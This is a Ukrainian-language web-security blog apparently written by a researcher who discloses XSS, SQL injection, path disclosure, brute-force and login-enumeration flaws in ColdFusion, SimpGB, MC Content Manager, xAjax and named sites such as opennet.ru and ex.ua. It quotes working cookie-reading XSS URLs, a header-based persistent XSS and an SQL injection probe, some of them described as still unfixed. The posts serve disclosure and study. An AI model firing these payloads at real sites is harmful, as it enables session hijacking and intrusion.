Websecurity - Веб безпека

В 2008 - 2010 роках я знаходив уразливості на багатьох сайтах на ColdFusion. Це SQL DB Structure Extraction, Full path disclosure та Cross-Site Scripting уразливості. В останнє я виявив подібні уразливості на www.sec.ru.

Вони мають місце на сторінці детального повідомлення про помилку (що часто виводиться на ColdFusion сайтах). І враховуючи те, що ці дірки відносяться до Adobe ColdFusion, 16.11.2010 я приватно повідомив про це Adobe, але вони проігнорували моє повідомлення. Тому я оприлюднюю детальну інформацію про уразливості.

SQL DB Structure Extraction:

http://site/page.cfm?id=-

Виводиться інформація про SQL запит (якщо даний веб додаток працює з СУБД).

Full path disclosure:

http://site/page.cfm?id=-

Виводиться повний шлях на сервері.

XSS:

При запиті до сторінки http://site/page.cfm?id=- з User-Agent “Mozilla<body onload=alert(document.cookie)>” можна було виконати код. Уразливість працювала в 2009 та 25.02.2010, зараз вона вже виправлена (вірогідно в останніх версіях ColdFusion).

XSS:

http://site/page.cfm?id=%3Cbody%20onload=alert(document.cookie)%3E

Вектор через тег script, що працював в 2009 та 25.02.2010, вже виправили в останніх версіях ColdFusion, але можна атакувати через багато інших векторів (наприклад, через тег body).

Уразливі потенційно всі версії Adobe ColdFusion.

14.06.2010

У листопаді, 05.11.2009, я знайшов Cross-Site Scripting уразливості (в тому числі persistent XSS) на секюріті проекті http://www.opennet.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на opennet.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.01.2011

XSS (persistent):

При доступі на сторінку http://www.opennet.ru /cgi-bin/opennet/bookmark.cgi?submit=add з заголовком:

Referer: http://www.opennet.ru/"><script>alert(document.cookie)</script>

Або через GET запит:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=http://www.opennet.ru/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує одразу, а також при заході на сторінку http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

Дані уразливості вже виправлені, але даний захист можна обійти використовуючи наступну Strictly social XSS:

Strictly social persistent XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=javascript:alert(document.cookie)//http://opennet.ru&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує при кліку на сторінці http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

З даних уразливостей все ще не всі виправлені.

В даній добірці уразливості в веб додатках:

• Sun Java Runtime CMM readMabCurveData Remote Code Execution Vulnerability (деталі)
• Sun Java Runtime Environment MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (деталі)
• Sun Java Runtime Environment JPEGImageReader stepX Remote Code Execution Vulnerability (деталі)
• Free Simple CMS path sanitization errors (деталі)
• Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (деталі)
• Sun Java Runtime Environment MIDI File metaEvent Remote Code Execution Vulnerability (деталі)
• Sun Java JDK/JRE Unpack200 Buffer Overflow Vulnerability (деталі)
• Reflected XSS in Atmail WebMail < v6.2.0 (деталі)
• TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
• BSI Hotel Booking System Admin Login Bypass Vulnerability (деталі)

17.11.2010

У липні, 15.07.2010, я знайшов Cross-Site Scripting, Brute Force, Insufficient Anti-automation та Abuse of Functionality уразливості в SimpGB. Дані уразливості я виявив на різних сайтах, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

25.01.2011

XSS:

POST запит на сторінці http://site/guestbook.php в параметрах poster, postingid та location в функції Preview. Якщо в гостьовій книзі використовується капча, то для атаки необхідний робочий код капчі. Або через GET запит:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force:

http://site/admin/index.php

Insufficient Anti-automation:

http://site/admin/pwlost.php

В даному функціоналі немає захисту від автоматизованих запитів.

Abuse of Functionality:

http://site/admin/pwlost.php

В даному функціоналі можна виявляти логіни.

Уразливі SimpGB v1.49.02 та попередні версії.

В даній добірці уразливості в веб додатках:

• OpenJDK vulnerabilities (деталі)
• Sun Java Runtime Environment JPEGImageDecoderImpl Remote Code Execution Vulnerability (деталі)
• Sun Java Runtime Environment JPEGImageEncoderImpl Remote Code Execution Vulnerability (деталі)
• SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3 (деталі)
• Sun Java Runtime Environment Mutable InetAddress Socket Policy Violation Vulnerability (деталі)
• Sun Java Runtime Environment XNewPtr Remote Code Execution Vulnerability (деталі)
• Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (деталі)
• New drupal6 packages fix several vulnerabilities (деталі)
• SQL injection vulnerability in e107 (деталі)
• SQL injection vulnerability in e107 (деталі)

16.11.2010

У липні, 25.07.2010, я знайшов Full path disclosure та SQL Injection уразливості в системі MC Content Manager (це українська комерційна CMS). Які я виявив на декількох сайтах на даному движку. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MC Content Manager.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.01.2011

Full path disclosure:

http://site/article.php?root=a

SQL Injection:

http://site/article.php?root=-1%20and%20version()=4

Уразливі лише не самі нові версії MC Content Manager.

В даній добірці уразливості в веб додатках:

• CompleteFTP Server v 4.x “PORT” command Remote DOS exploit (деталі)
• Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities (деталі)
• Joomla Component Clantools version 1.5 Blind SQL Injection Vulnerability (деталі)
• Scientific Atlanta DPC2100 WebSTAR Cable Modem vulnerabilities (деталі)
• XSS in Horde Application Framework <=3.3.8, icon_browser.php (деталі)
• Security problems in Zenphoto version 1.3 (деталі)
• Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH) (деталі)
• New typo3-src packages fix regression (деталі)
• Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability (деталі)
• Multiple Vulnerabilities in Cisco Network Building Mediator (деталі)

08.06.2010

У листопаді, 04.11.2009, я знайшов Cross-Site Scripting та Full path disclosure уразливості на проекті http://xataface.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

21.01.2011

XSS:

http://xataface.com/admin.php?-table=pages&-search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&-action=search_index

Full path disclosure:

Змінна DATAFACE_PATH в тілі кожної сторінки сайта.

Дані уразливості вже виправлені.

04.06.2010

У жовтні, 31.10.2009, я знайшов Abuse of Functionality, Insufficient Anti-automation та Brute Force уразливості на проекті http://www.ex.ua (файлообмінник). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.01.2011

Abuse of Functionality:

На сторінці http://www.ex.ua/register в полі Логін можна визначити логіни користувачів в системі. Це також можна зробити через GET запит. Дана уразливість дозволяє провести Login Enumeration атаку.

http://www.ex.ua/r_check_login?login=123

Insufficient Anti-automation:

Враховучи, що дана функція немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі. В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

Brute Force:

На сторінці http://www.ex.ua/login можливе визначення паролів користувачів. В перші декілька спроб капча відсутня, лише потім вона з’являється, що може використовуватися для атаки.

Дані уразливості досі не виправлені.

06.11.2010

У липні, 07.07.2010, я знайшов Cross-Site Scripting та Full path disclosure уразливості в xAjax та xajax_jquery_plugin. Які я виявив на різних сайтах, що використовують дані веб додатки, в тому числі на деяких сайтах на MC Content Manager. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатків.

19.01.2011

XSS:

http://site/cms/’;alert(document.cookie);/*

Це DOM Based XSS. Дана уразливість зокрема має місце в MC Content Manager (що використовує xAjax).

Full path disclosure:

http://site/xajax_core/legacy.inc.php
http://site/xajax_core/xajax_lang_de.inc.php
http://site/xajax_core/xajax_lang_nl.inc.php
http://site/xajax_core/plugin_layer/xajaxCallableObjectPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxDefaultIncludePlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxEventPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxFunctionPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxScriptPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxDefaultRequestProcessorPlugin.inc.php
http://site/jquery.php
http://site/demo.php

Файли jquery.php та demo.php відносяться до xajax_jquery_plugin. Дані уразливості мають місце на різних веб сайтах та у різних веб додатках, що використовують xAjax та xajax_jquery_plugin.

Уразливі потенційно всі версії xAjax. Уразливі всі версії xajax_jquery_plugin.